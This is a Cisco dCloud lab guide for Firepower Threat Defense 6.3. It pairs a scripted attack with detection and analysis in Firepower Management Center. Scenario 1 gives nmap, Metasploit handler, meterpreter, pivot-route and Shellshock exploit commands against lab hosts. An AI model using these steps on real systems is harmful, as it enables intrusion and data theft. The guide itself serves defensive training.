Firepower Threat Defense Attack Lab 6.3 Guide

Cisco dCloud
Cisco Firepower Threat Defense 6.3 Attack Lab

Last Updated: March 2019 dCloud: The Cisco Demo Cloud
IMPORTANT! This content includes pre-release software, and you may experience issues with some features. The included
documentation was not created or verified by dCloud. Check Cisco dCloud regularly for new releases!
About This Lab

The Cisco Firepower Threat Defense 6.3 Attack Lab includes the following scenarios:
 Scenario 1: The Attack—assume the role of an attacker, perform a realistic attack against the target organization, use phishing
with a malicious Excel to take control of a client on the inside of the network, and leverage the compromised client to attack
other systems on the inside.
 Scenario 2: Getting Started with Firepower Management Center—become familiar with the Firepower Management Center
(FMC) in order to understand the overall structure of the FMC, including how FMC automatically discovers the network it is
protecting, the operating systems, the applications relevant vulnerabilities, and logged in users. This also focuses on a typical
NGFW policy, understanding the ability to create policies to control applications and to leverage user identity from Cisco
Identity Services Engine (ISE). This section also briefly touches on remote access configuration.
 Scenario 3: Detection and Analysis—investigate a reported attack (the one from Scenario 1) using Firepower Management
Center, looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP),
and Security Intelligence to understand the attack and the impact.
 Scenario 4: Rapid Threat Containment with Cisco ISE. Here we will see how the NGFW can request that a client found to be
comprised be put immediately and automatically into quarantine by Cisco Identity Service Engine
 Scenario 5: Reporting—analyze and customize sample reports.
The Lab Guide includes the following sections:

About This Lab
Requirements
What’s New
About This Solution
Topology
Get Started
Scenario 1. The Attack
Scenario 2. Getting Familiarized with Firepower Management Center
Scenario 3. Detection and Analysis
Scenario 4. Rapid Threat Containment
Scenario 5. Reporting
© 2019 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 63
Cisco dCloud
Requirements
The table below outlines the requirements for this preconfigured demonstration.
dCloud: The Cisco Demo Cloud
Table 1. Requirements
Required Optional
● Laptop ● Cisco AnyConnect
What’s New
 FMC and FTD now upgraded to 6.3
 The hacking scenario has been simplified, further scripted and now relying only on Metasploit.
 Renewed certificates of lab components (FMC, ISE, FTD, ASA, Workstations).
 AnyConnect SSL session now terminates always on FTD. This includes Scenario 4, Rapid Threat Containment, since
FTD v6.3 supports Change of Authorization (CoA) . The ASAv previously used for this scenario has been removed from
the topology.
About This Solution

The lab is aimed at technical decision makers, security engineers and CSOs with an interest in security technology. The focus is
not on how to install or configure the NGFW (the Before Phase) but rather to detect, investigate and mitigate attacks (the After
Phase). Therefore, we will start working with a preconfigured system.
NOTE: The lab assumes an understanding of techniques used by attackers in the Attack Kill Chain. However, the lab instructions
will lead you at conducting step-by-step attacks.
The lab does not assume any prior training on Firepower.
Cisco dCloud
Topology
This content includes preconfigured hosts, users and components which will be used to execute the scripted scenarios and
demonstrate the features of the Firepower solution. Most components are fully configurable with predefined administrative user
accounts. You can see the IP address and user account credentials to use to access a component by clicking the component icon
in the dCloud Topology menu of your active session and in the scenario steps of the lab guide.
Figure 1. dCloud Topology
Cisco dCloud
Figure 2. Lab Topology
Systems in this lab
The following information applies to the preconfigured hosts and users in this lab:
 Jumper—this is the Jump host from which you can access other systems in this lab.
 Evil2—this is the system from which the attacks are launched in Scenario 1.
 Workstation-A —this is a client logically inside the target organization. It can be reached via remote desktop on its public IP
(198.18.133.38). Workstation-A is pre-configured to automatically establish AnyConnect VPN to FTD. Both traffic to the
inside of the network (198.19.10.0) and traffic to the internet will go inside the tunnel and is inspected by FTD.
 IoT Surveillance camera—this is the ultimate target of the attack in this scenario.
 FTD – the FTD is managed via the FMC and will not be accessed directly.
 FMC will be accessed via Jumper using Chrome.
 There are also other systems to support the lab, such as the Active Directory Domain Controller, Cisco Identity Services
Engine (ISE). There should be no reason to access these systems directly.
 Workstation-B and Remediation : They appear on the topology, but are not used in this lab.
Table 2. Preconfigured User Information
Device User ID Password

Jumper 198.18.133.135 cisco C1sco12345
Evil2 198.18.133.111 root C1sco12345
Cisco dCloud
Workstation-A 198.18.133.38 DCLOUD\mordiac C1sco12345
FMC public IP 198.18.133.10 admin C1sco12345
Get Started
A reservation for this lab will need to be performed from the dCloud Catalog. For those attending a Cisco events, such as NGFW-
TD, the sessions will have already been created and the instructor will distribute the credentials.
1. Once connected to dcloud.cisco.com, initiate your Cisco Firepower Threat Defense v6.3 attack lab by clicking on the View
button. [if you need help: Show Me How]
NOTE: If you just scheduled your session, it might report Starting…. It may take up to 10 minutes for your session to become
active and finally see the green button: View.
2. Optionally, for better performance, you may connect to the lab with Cisco AnyConnect VPN [Show Me How] and use the
local RDP client installed on the computer you are using to access dCloud [Show Me How]
 Jumper: 198.18.133.135, Username: cisco, Password: C1sco12345
3. Alternatively, if performance is acceptable, from the active topology page, click on Jumper, and select Remote Desktop [see
note below]
NOTE: You can also connect to the workstations using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.
4. On Jumper, open Chrome and connect to the Firepower Management Center at https://fmc. Logon with the credentials:
admin/C1sco12345.
5. Test connectivity to Workstation-A by clicking the desktop icon workstationA and log in with the username
DCLOUD\mordiac and the password C1sco12345.
Cisco dCloud
Figure 3. Accessing Workstation-A form Jumper.
6. From Workstation-A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
Chrome, and navigating to http://iot.dcloud.cisco.com. (This step will also generate traffic to the IoT with which the FMC will
be able to determine the OS and applications running on the IoT device).
Figure 4. Successful connectivity to IoT
7. From Jumper’s desktop, open mtputty which we will use to check connectivity to evil2.
8. Expand the MTPuTTY sessions section and double-click on evil2. You should be automatically logged in with username
root and password C1sco12345.
Cisco dCloud
Figure 5. MTPuTTY Configurations for evil2
Cisco dCloud
Scenario 1. The Attack

In this scenario, we assume the role of the hacker and we will carry out a vicious attack. The attacker has done some research and
found out that: dCloud: The Cisco Demo Cloud
 The organization has an employee Mordiac, who happens to be the CFO but he is also one of the IT administrators. Mordiac
happens to also be looking for a new job (he has just updated his Linkedin profile). Our attacker discovered his potential
victim through social engineering.
 There is an internal device IoT.dcloud.cisco.com at 198.19.10.211 with some juicy corporate secrets. The attacker would
really like to get access to this device.
Steps
1. From Jumper, use the SSH session to evil2. Attempt to get to the internal server iot.dcloud.cisco.com. Scan IoT with nmap
to see if it has ports 80 or 443 opened. Type manually the following nmap command, since copy/paste from the Lab Guide
PDF may not work.
nmap -P0 198.19.10.211 -p 80,443
where:
-P0 means to skip the Nmap discovery stage for host 198.19.10.211, to treat this host as already online [number 0, and not
capital letter O. Also, though -P0 is still working, its newest forms are: -Pn and -PN]
-p means to perform a port scan on the specific ports mentioned (HTTP and HTTPS in this case).
Figure 6. nmap scan against IoT device.
NOTE: Nmap (see www.nmap.org) is a well-known tool for attackers and penetration testers that does scanning and much more.
2. The results below show that the attacker cannot reach the IoT device directly (note the word filtered).
root@evil2:~# nmap -P0 198.19.10.211 -p 80,443
Cisco dCloud
Starting Nmap 7.50 ( https://nmap.org ) at 2018-06-24 03:13 EDT

Nmap scan report for 198.19.10.211
Host is up.
PORT STATE SERVICE
80/tcp filtered http
443/tcp filtered https
Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
3. Since the attacker evil2 cannot access the target, IoT device directly, an attempt will be made to compromise another
corporate client which the hacker will then use as a springboard to attack inside hosts. The attacker discovers a corporate
client: Workstation-A which it thinks it can compromise. Though Workstation-A is connected to the internet, it also has
connectivity to the inside corporate network via a VPN tunnel. The attacker has prepared a number of Excel spreadsheets
embedded with malicious macros. Those macros are crafted to bypass Antivirus. The attacker will trick Workstation-A user
into accessing and opening one of those spreadsheets. The malicious macro will initiate a connection from Workstation-A to
evil2, thus opening a Command and Control connection back to the hacker. Evil2 will then have a foothold into Workstation-
A and will use it to launch its attack on his ultimate target: IoT device.
4. Let’s prepare evil2, to accept an eventual incoming connecting from Workstation-A. On evil2, run the predefined script
starthack to start Metasploit. With this script, evil2 will be waiting for an incoming connection, from a compromised
workstation, on its port 8086.
root@evil2:~# starthack
5. The following screen output displays.
Cisco dCloud
Figure 7. Starting Metasploit
NOTE: Metasploit is a well-known formidable attack framework, used by both penetration testers and attackers.
6. From Jumper, use the already opened RDP session to Workstation-A and verify that AnyConnect VPN session is
established back to the Corporate network, by clicking on the expansion arrow in the system tray. Click the AnyConnect icon.
If you are not connected, press the connect button.
Cisco dCloud
Figure 8. Check that AnyConnect is connected.
7. On Workstation-A, open Firefox. The homepage should open as follow:
8. Now, let’s see what happens when a user connect to a website which, unknowingly, propagates malware. From Workstation-
A’s Firefox default page, click Download files.
Cisco dCloud
Figure 9. Using Firefox on Workstation-A to access a website and download files (unknowingly that malware is present)
9. This displays a few Excel files to download. As an unsuspecting user would do, click the link Catjob2.xls and try to download
it. It will fail, as this type of malware is known and can be stopped immediately.
Cisco dCloud
Figure 10. Excel File infected with a known malware, thus blocked
10. Click OK to close the Downloading dialog box, and click Cancel.
11. Click opportunity.xls. This file is a zero-day exploit, and it is carefully coded to bypass defenses. This spreadsheet, when
opened with content enabled, will execute a script to establish a Command & Control connection back to evil2! Evil2 would
then have a foothold inside one of our corporate clients from which it can pivot and attack other inside hosts.
Cisco dCloud
Figure 11. Excel file, opportunity.xls, infected with a zero-day malware
12. Save the file to the Desktop of Workstation-A.
13. Double-click the downloaded Excel file from the desktop of Workstation-A to open it.
NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures, and are designed to
discourage end users from running macros. However, using social engineering it is often possible to bypass this defense by fooling
the recipient at thinking that it’s from a safe source, safe content, etc.
NOTE: Do NOT quit the Excel application until you are done with this lab.
Cisco dCloud
Figure 12. Enable Editing in Excel
Figure 13. Enable Content in Excel
14. Return to Jumper and access the SSH console for evil2. The screen should now indicate that Metasploit has received an
incoming session from the compromised client. The IP shown 198.18.133.11 is the IP after PAT of Workstation-A. IP Address
198.18.133.11 is the FTD outside IP address.
Cisco dCloud
Figure 14. Metasploit receives a session from the compromised client.
15. That shows that the Excel file was malicious and successful at having Workstation-A reached out to evil2 port 8086, thus
providing the attacker with a client-side foothold . The number of AV vendors who may detect a particular file as malicious
would vary over time. When this type of malware was first created in January 2018, there were no AV vendors who detected
the file as malicious. (As time goes by, it has changed). This proves why retrospection, explained later, is important. This
particular malware resides entirely in memory and is not written to disk. Moreover, no new processes are created.
NOTE: Perimeter defenses (including Cisco’s) can always be bypassed by a determined attacker. A unique value of Cisco
NGFW (FTD) is the ability to detect the breach and to present evidence (Indicators of Compromise (IoCs)) that a breach
may have occurred. This will be explained later in this lab.
16. From the Jumper’s SSH session to evil2, verify that the meterpreter session has been established. You may have to hit return
to get the msf prompt, before typing sessions –i
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection

-- ---- ---- ----------- ----------
1 meterpreter x86/windows DCLOUD\mordiac @ WORKSTATIONA 198.18.133.111:8086 ->
198.18.133.11:50409 (198.18.133.38)
msf exploit(multi/handler) >
NOTE: Optional steps 17-20 are to investigate how an intruder may control a compromised machine, viewing files, uploading files
etc. If you are already familiar with this, feel free to proceed directly with step 21.
17. Have evil2 interact with the compromised client, Workstation-A, by typing sessions –i 1 (where 1 is the number of your
session, should be 1).
msf exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...
Cisco dCloud
meterpreter >
18. Verify that we can now control the compromised machine, list files (ls) steal files, upload files.
meterpreter > pwd

C:\Users\mordiac\Documents
meterpreter > ls
Listing: C:\Users\mordiac\Documents
===================================
Mode Size Type Last modified Name

---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Music
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Pictures
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Videos
100666/rw-rw-rw- 402 fil 2016-03-07 14:47:14 -0500 desktop.ini
meterpreter >
19. Metasploit also has other interesting modules. For example, it can dump credentials, start a key logger (logging passwords)
and start a webcam recording, etc. The help command shows multiple options.
meterpreter > help
Figure 15. Help command output
Cisco dCloud
20. After this brief discovery of options available for the attacker, we will turn our attention to something even more dangerous –
lateral movement. But first we need to background the meterpreter session.

meterpreter > background
Figure 16. Sending meterpreter to the background of Metasploit
21. Next, the attacker wants to attack systems on the inside corporate network: pivoting (or jumping) via our compromised
Workstation-A which has a VPN connection to the FTD and thus has the functionality of communicating with inside hosts. On
evil2, we will configure the Metasploit session with a route to the inside Corporate network.
msf exploit(handler) > route add 198.19.10.0 255.255.255.0 1
Figure 17. Pivoting – jumping via a compromised host, to any system reachable from the compromised host.
NOTE: Understand how the attack is happening via the compromised client, since the IoT device is not directly reachable. The
compromised host, Workstation-A, is physically outside of the corporate network. However, using a VPN tunnel, Workstation-A
has a network presence on the inside corporate network and thus can communicate with other hosts of that network, among which
IoT Server. So, by compromising Workstation-A, we can reach the ultimate goal: the IoT device.
22. Finally, the hacker will attack the IoT device using the meterpreter session.
23. From SSH windows, invoke the meterpreter resource script iot.rc which will trigger the attack against the Bash Shellshock
vulnerability (CVE-2014-6271). Even though this vulnerability was discovered in September 2014, the attacker is confident that
the targeted device might be easily exploited since many IoT systems are often neglecting when it comes to releasing and
deploying patches for them.
msf exploit(multi/handler) > resource iot.rc
[*] Processing iot.rc for ERB directives.
resource (iot.rc)> use exploit/multi/http/apache_mod_cgi_bash_env_exec
resource (iot.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi
Cisco dCloud
resource (iot.rc)> set rhost 198.19.10.211

rhost => 198.19.10.211
resource (iot.rc)> set target 1
target => 1 dCloud: The Cisco Demo Cloud
resource (iot.rc)> set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
24. Run the exploit.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
NOTE: If successful, the bash shell exploit would take control of the vulnerable system, IoT device in our case, and a new
meterpreter session would be returned to evil2, this time from the IoT system. In this case however, the attack is not working in
spite of the system being presumably vulnerable (not patched). We are not too sure yet of why the Bash Shell attack wasn’t
successful: maybe the device was patched? Or could it be because of an IPS block? The reason for this attack failure will be
investigated in Scenario 3.
Figure 18. Run the Exploit
Conclusion
This concludes the first scenario. To summarize what has happened:
 The attacker wanted to attack the internal IoT device to control the video camera.
 The attacker tried to communicate with the IoT device directly but it seemed to be blocked by the firewall.
 The attacker then launched a phishing attack, against a naïve corporate user, using a zero-day malware package (Excel
Macro), taking control of the corporate machine which has a connection on the inside network via VPN.
 The attacker, using the compromised corporate client, Workstation-A, as a springboard, then decided to go after the IoT
device with the Bash Shellshock attack. This attack seems to have failed—maybe an IPS blocked it, or the device was
patched. You will find out what happened in Scenario 3.
 The attacker is still in the network via the compromised corporate client, and will seek new ways to attack.
This is now a race against time.
Cisco dCloud
Scenario 2. Getting Familiarized with Firepower Management Center

In this scenario, we will access the FMC and familiarize ourselves with its GUI. We will focus on:
 Context Explorer: provides detailed and interactive information of the network FMC is protecting, such as hosts, their operating
systems, their applications, their vulnerabilities and the logged users
 IPS Auto-Tuning: Firepower’s knowledge of the corporate network (Network discovery) can be used to automatically tune the
IPS rules
 FMC Policies: The NGFW ruleset for Firewalling, IPS, AMP & File type, SSL, Identity, etc.
 NGFW and ISE Interaction: How FMC can get identity information from ISE or Active Directory (and in a later scenario how
FMC and ISE can cooperate to mitigate the actions of a dangerous host on the corporate network)
 Managed Devices Configuration: NAT, Interfaces and Routing of FTD firewalls deployed by the corporation
NOTE: In this lab setup, the FMC may display warnings that it cannot download security intelligence – this warning can be
ignored. In a real production environment, your FMC would have consistent access to Cisco TALOS services. In the dCloud
environment however, this is not the case.
Figure 19. TALOS might be unreachable from the dCloud environment
Steps
1. From Jumper, return to the FMC session opened, earlier in the lab. If the FMC session is not there, from Jumper, open
Chrome and logon to FMC (https://fmc), using username:admin and password: C1sco12345.
2. Select Analysis > Context Explorer and adjust the time period to 1 day.
NOTE: Due to the dCloud environment, some of the information may take a long time to load. If the widgets have not loaded after
60 sec, refresh the browser page.
Cisco dCloud
Figure 20. Adjust Time period for Content Explorer
3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged in users and vulnerabilities. Scroll down to the section on Network
Information. As you can see, FMC has discovered different Operating Systems.
Cisco dCloud
Figure 21. Context Explorer – Network Information view
4. Scroll down to Application Protocol Information to examine what applications have been discovered.
Figure 22. Context Explorer – Application Protocol Information
NOTE : During lab testing, the pie chart for Hosts by Risk and Application did not consistency appeared. If that pie chart is not
appearing, just move on with the lab.
5. From Analysis > Context Explorer, navigate to the widget group called Network Information, and find under Traffic by
Source IP, IP address198.19.18.38 (Workstation-A) . Then, click on the vertical bar for that IP address, and select from the
menu, View Host Information.
NOTE: It is possible to pick any section in a pie-chart, or any staple in a bar and click on it to be able to do further filtering or drilling
down the analysis (jumping to events). For specific ip addresses, it is also possible to view the host profile. Workstation-A
Cisco dCloud
Figure 23. Content Explorer - Network Information
6. Look at the Host Information. This section displays, for that specific host, its logged users, Indicators of Compromise,
Operating system, Applications, and Vulnerabilities.
Figure 24. Host Profile
7. Scroll down to examine the Applications Discovered on the host.
Cisco dCloud
Figure 25. Host Profile - Applications discovered
8. Scroll down to examine the potential vulnerabilities tracked on this host. You can click on a vulnerability hyperlink to see
more details. Some vulnerabilities may not yet be publicly disclosed so details are hidden (but there may still be IPS/snort
signatures).
Figure 26. Host Profile - Vulnerabilities
Cisco dCloud
NOTE: Through Network Discovery, FMC has gained knowledge of the network: hosts, their Operating Systems, the applications
and vulnerabilities running on those hosts. This information can be used to automatically fine tune the IPS policies.
9. The FMC can be configured with multiple IPS policies, which are then selectively assigned to different dCloud:
Access The Cisco Demo Cloud
Control Policies
(ACP), which themselves are applies to different kind of traffic. Specific ACPs can be applied based on multiple variables such
as: source, destination, applications, URL, etc . Coming back to the IPS policies: You may wish to have a specific IPS policy
for traffic dealing with file sharing, and a different policy for traffic going to webmail services. In this lab, for simplicity sake, we
are using a single IPS policy, called dCloud-IPS. Select Policies > Access Control > Intrusion and edit the dCloud-IPS
policy by clicking the pencil icon.
Figure 27. Edit the dCloud-IPS Policy
10. You will notice that this dCloud-IPS policy is configured with the Base Policy Balanced Security and Connectivity. Using a
specific base policy as a starting point to configure the dCloud-IPS policy enables you to take advantage of the experience of
TALOS, of the knowledge it has of the different signatures available for different systems, of the pervasiveness or not of some
type of attacks, etc. Take a moment to click on the down arrow of the base policies to see the possible selection. Do not
change the base policy: leave it at Balanced Security and Connectivity.
11. Through passive discovery and other methods, Firepower discovers hosts on your network, their OS, their ports and the
applications running on those clients. With that knowledge, FMC can then recommend changes to the IPS configuration. This
is the self-tuning capability of Firepower NGIPS. Obviously, the administrator has the last word on accepting the
recommended changes or not. Click on the link No Recommendations have been generated, to setup Firepower
Recommendations.
NOTE: the number of recommendations might vary in time, since those are based on Cisco Security intelligence which is
constantly updated by the TALOS team.
Cisco dCloud
Figure 28. Edit IPS Policy Recommendations
12. Next, click on Generate Recommendations. After 1-2 minutes, you should have a pop-up reporting Success. Then, click
OK.
Figure 29. Generating Recommendations for IPS policies
13. Next, click View Recommended Changes”. Do NOT click on Use Recommendations, since it is not necessary for this lab
and in the interest of time.:
Cisco dCloud
Figure 30. Viewing the Recommended IPS changes
14. There are about 3000 IPS signatures, which Firepower recommends you change (based on its knowledge of the network).
The advantages of tuning IPS ruleset are that you both gain performance but also reduce the risk of false positives.
Figure 31. IPS Signatures Tuning
15. Let’s continue our tour of FMC policies. Select Policies > Access Control > Access Control. Click Leave Page if prompted.
16. In our lab, only one Access Control Policy has been configured: dCloud-Access-Policy. Organizations could have multiple
Access Control Policies, each applied to different managed devices (i.e. to different FTD). As an example, you could have a
specific ACP pushed to Branch firewalls, and a different one used at by the head office edge firewall. Click on the pencil icon
to edit the dCloud-Access-Policy.
Cisco dCloud
Figure 32. Access Control Policies
17. Examine the different options for the dCloud-Access-policy. It is possible to have different rules depending on Active Directory
Group, Application, URL category but also attributes from Cisco ISE. For each rule, you will define if the traffic is allowed to go
or blocked. You can also assign different IPS policies or policies for AMP and logging, per rules.
Cisco dCloud
Figure 33. Access Control Policies: Policy Options
18. Try adding a new rule to examine the options for applications, URLs, Users and ISE attributes. You do not have to create the
rule and can cancel out after investigating what options are available.
Figure 34. Access Control Policies: Add Rule
Cisco dCloud
Figure 35. Access Control Policies: User options (Active Directory Groups)
Figure 36. Access Control Policies: ISE Attributes
NOTE: the ability to assign policy on ISE attributes such as the Security Group Tag (SGT). This allows for much more flexibility
than just looking at AD groups; we could for example have different policies for different device types, or different policies
depending on device posture. Also, it allows us to create policies for devices that are not members of Active Directory (such as
iPADs, printers, surveillance cameras) but that have been profiled by Cisco ISE.
Cisco dCloud
Figure 37. Access Control Policies: Application Choices
19. Click on Cancel to close the Add Rule window. Examine the SSL decryption policies. Select Policies > Access >SSL and
edit the dCloud-SSL Policy, by clicking on the pencil icon.
NOTE: It may be desirable in many cases to control when to decrypt SSL traffic for reasons of policy (law and compliance) or
performance.
It is possible to decrypt/not decrypt based on several criteria such as source ip address, destination ip address, user identity (e.g.
do not decrypt HR traffic), destination URL category (e.g. do not decrypt Category Finance) and so on.
Figure 38. SSL Policy
Cisco dCloud
Figure 39. dCloud-SSL Policy
20. From Jumper, click on the RDP icon to access Workstation-A. If you don’t have the RDP icon, initiate a new RDP session by
double-clicking on the Workstation-A icon on the desktop of Jumper.
Figure 40. Accessing Workstation-A RDP session
21. We will conduct two tests to check the decryption policy, by trying to download malicious files. First, from Workstation-A,
using Firefox, enter the URL: https://www.evilchi.com/Catjob3.xls. The file name is case sensitive. You will see the following
dialog box.
Cisco dCloud
Figure 41. Unsuccessful download of an infected file
22. Close the dialog box of the unsuccessful download. Return to the homepage of Firefox and click on Download Files >
Download malware over HTTPS. If nothing happens, close and reopen Firefox and click again on Download Files >
Download malware over HTTPS. Eventually, you should see a webpage with Secure Connection Failed. This attempted
https download of an infected file is also failing and here is why: FTD calculates the fingerprint of the spreadsheet you are
trying to download. Catjob2.xls and Catjob3.xls each produces a unique SHA-256 result. Firepower queries the Advanced
Malware Protection (AMP) service about those files to find their reputation. AMP immediately responds that those files are
known as malware and thus the firewall blocks the end of the transfer of the file to the client, thus explaining the message in
the dialog window: “…part could not be saved, because the source file could not be read”.
Note: For SSL decryption to work on Workstation-A, this host must trust the CA cert used by the man-in-the-middle decryption
operation. In our scenario, the MITM is done by FTD which is using the FMC cert which was signed by CA. This cert has been
installed on all the corporate clients prior to starting this lab.
Figure 42. Download Blocked on Workstation-A – result you will get once you refresh the browser, or re-attempt.
Cisco dCloud
23. On FMC, examine Device configuration for the FTD firewall. Select Devices > Device Management. In our case, we are
managing only one NGFW, called FTDv. In your environment, you could possibly have multiple NGFW and NGIPS listed
here. Edit FTDv by clicking on the pencil icon.
Figure 43. Device Management on FMC.
24. Examine the configuration options for our NGFW called FTDv.
NOTE: With Firepower Threat Defense (FTD) software, FMC can configure all features such as NAT, Routing (static routes, BGP,
OSPF), DHCP server settings etc. Feel free to investigate Device Management, however, do not make any changes.
Figure 44. Configuration Options of our NGFW
25. Examine Remote Access VPN Policy: Devices > VPN > Remote Access. FTD supports terminating remote access sessions
from Cisco AnyConnect. This has already been configured (Workstation-A in this lab is configured to automatically connect to
FTD). Feel free to examine the Remote Access configuration, but do NOT make any changes.
Cisco dCloud
Figure 45. Remote access VPN configuration.
Figure 46. Editing the VPN policy RA-VPN
26. View the connected Remote Access VPN users. Go to Analysis > Users > Active Sessions. We can customize the columns
shown in order to view more details on the remote access sessions. You will have to click any ‘X’ sign in the titles of columns,
and then select which columns you wish to show. Ensure that you select all the VPN columns choices. After applying, you may
have to scroll to the right to see this information.
Note: In this lab running v6.3.0, some fields are not populated. This issue is being investigated.
Cisco dCloud
Figure 47. Selecting the Columns for the display
Figure 48. Details of Active Sessions with VPN columns enabled
27. You will notice that computer icon of our Workstation-A is appearing in orange/red color. This signifies Indication of
Compromise for that host and will investigate this issue in the next scenario.
Cisco dCloud
Conclusion
This concludes the second scenario. To summarize what has happened:

 You got familiarized with Context Explorer and it’s investigative capability. Much more on this in the next scenario
 You were introduced to the Intrusion Policy and how you can use the Base Policy to get started with IPS configuration and
how the IPS recommendations could be used for self-tuning.
 You looked at the configuration of Access Control Policies
 You looked briefly at the Device Configuration and VPN configuration.
Cisco dCloud
Scenario 3. Detection and Analysis

In this scenario, we will focus on the Detection and Analysis capabilities of Firepower, of the attack performed in Scenario 1.
Firepower makes it easy to identify hosts that are compromised, by collecting Indicators of Compromise (IoCs) per host. An IoC
is a reasonable suspicion that a host may be compromised and is under the control of somebody else. With FMC, it is also
possible to quickly understand the context of the host, Operating System, running applications, vulnerabilities, malware, logged in
users, and connections to and from this host.
Steps
1. From Jumper, log in to the Firepower Management Center with Chrome, using https://fmc ( or https://198.18.133.10 ) with
Username: admin and password: C1sco12345.
2. Select Analysis > Context Explorer. This is a good starting point for Security Analysts.
NOTE: Look at the Indications of Compromise - Indication by Host. One host (198.19.18.38) has experienced IoCs.
Figure 49. Indications of Compromise
NOTE: FMC collects the Indicator of Compromises (IoCs) per host, making it easy for the Security Analyst to identify the hosts that
need attention now.
Cisco dCloud
3. Since host 198.19.18.38 has some Indicators of Compromise, we will investigate further by clicking the blue bar in the
Indications by Host section and choose View Host Information.
Figure 50. Indication by Host widget dCloud: The Cisco Demo Cloud
4. The Host Profile should open in a separate window.
Figure 51. Host Information for Workstation-A
Cisco dCloud
NOTE: Learn more about the host that may have been compromised.
FMC offers you contextual information about a potentially compromised machine, such as:
Which user is logged in to the machine now?
Which users have been logged into the machine previously?
Which operating system is running on that host? (Windows, Linux…)
Which applications have been observed to be running on that machine?
Which vulnerabilities could this machine have?
Which indicators of compromise have been seen on this machine?
Which connection events (firewall L3/L4 connections) relate to this machine?
Which file events relate (files uploaded/downloaded) to this machine?
Which malware events (files that are malware) relate to this machine?
Which IPS events relate to this machine?
5. From Host Profile, check which users have logged on the machine.
NOTE: Quiz yourself on why is it important to understand that Mordiac has been logged on to the machine?
Mordiac is currently the CFO, so he has access to critical financial reports that could be secret.
Mordiac may be eventually be promoted to CEO.
Mordiac happens to also be a domain admin, so compromising his credentials, using a tool like a key logger or mimikatz, could
potentially expose all the credentials of the organization!
Cisco dCloud
6. From the Host Profile, check which operating system the compromised machine is running.
Figure 53. Operating Systems

7. From the Host Profile, we see a separate section, called Indications of Compromise. Check which Malware events are
associated with this host by clicking on Malware Events.
NOTE: Your results might differ slightly from those shown in this lab guide.
Figure 54. Accessing malware events from the Host Profile
Cisco dCloud
Figure 55. Malware summary – summary windows
8. From the Malware Summary window, click Table View of Malware Events to see more details, such as sending and
receiving hosts, sending country, and much more.
Figure 56. Malware Summary – Table View of Malware Events
Note that you should see the known bad files downloaded earlier (Catjob2.xls and Catjob3xls). However, the file with the zero-day
malicious macro (opportunity.xls) will likely not be classified as malware yet.
9. To view information about opportunity.xls, go to Analysis > Files > File Events. This will show a summary of files which
transited through our NGFW. Locate the file type MSOLE2 with Disposition Unknown. Click on the down arrow on the
extreme left. This should produce a more detailed view about these files, including the IP addresses to/which it was
downloaded, country of origin, and the SHA256 hash of the file:
NOTE: If you are doing this lab over a few days, you might need to expand the time frame if you don’t see the MSOLE2 unknown
file category. See screen shot below:
Cisco dCloud
Figure 57. File Events – File Summary
10. To drill down even further in the network trajectory, click on the disposition symbol (the white circle) on the left of the SHA256
hash. This should take you to the Network File Trajectory page for that file. See note below and following steps if you didn’t
get the expected Network File Trajectory window.
Figure 58. File Events – investigating a fingerprint
Cisco dCloud
NOTE: Because of an issue in this lab (being investigated) you may not be taken to the Network File Trajectory but instead see the
webpage frozen in “Loading”. If necessary, to work around this issue follow the following step.
11. Perform this Workaround only if you did not get to the network file trajectory in the previous step. Go to
Analysis>Files Network Trajectory. Then, look at “Recently Viewed Files” and click on the link for the file opportunity.xls
corresponding to the SHA256 hash above.
Figure 59. Perform this step only as a workaround if Network File Trajectory didn’t appear above
12. Inspect the Network File Trajectory. The network file trajectory shows which computers have downloaded the file, from which
host and at which time did the transfer happened. It also shows the Threat Score, which is the result of the Dynamic Analysis
– sandboxing. This file has a high threat score. Click on the three dots (step 1 in below screen capture) showing the high
threat score and a summary of the Dynamic Analysis should open. Click on the View Full Report (step 2) to get to the Threat
Grid Analysis Report, for further details, which will open in a new browser tab.
13. Inspect the Full Analysis from AMP Threat Grid. This gives a lot of information about the behavior of the file.
Cisco dCloud
Note: Look at the behavioral indicators, which may indicate that this is malware. One of the indicators is the fact that this office
document tried to establish network communications to www.trustme.cat. Even though this server was not available during the
dynamic analysis (server is internal in the lab only), Threat Grid flagged this as something suspicious from dCloud:
an Office
The Document.
Cisco Demo Cloud
Combined with the other behavioral indicators it was enough to give the file a high threat score. Coming up: more explanations on
how Cisco TALOS deals with high threat scores discovered by Threat Grid – obviously, you would want Threat Grid to share with
AMP file reputation those high threat scores.
Figure 60. Threat Grid Analysis Report from the Dynamic Analysis of the malware detected by FTD
14. Understanding Retrospection: Go back to Analysis > Files > Network File Trajectory. Be patient, due to our dCloud lab
environment, it might take a minute for the page to open. If after 1 minute, if the page is still at “Please Wait…”, attempt a
browser refresh.
15. Select the file Job-Obscense-Salary.xls with SHA256 ending with f778, by clicking on its hash result. You will notice that the
file has a high threat score from Threat Grid. In a production environment, Threat Grid would communicate its findings with the
AMP Cloud which in return could use this information to retrospectively convict the files, sending retrospective events to all
AMP connectors [AMP for Endpoints] across the world that would have queried about that file. The file disposition would then
change from unknown to malware. An example of what this would look like is shown below. CAUTION: This is only an
example. You will not see this in our lab.
Cisco dCloud
Figure 61. YOU WILL NOT SEE THIS IN OUR LABS: THIS IS AN EXAMPLE.
NOTE: Firepower AMP records all file transfers, regardless of disposition (unknown, clean or malware) and can change its mind
later and tell you about it! This is called retrospection!
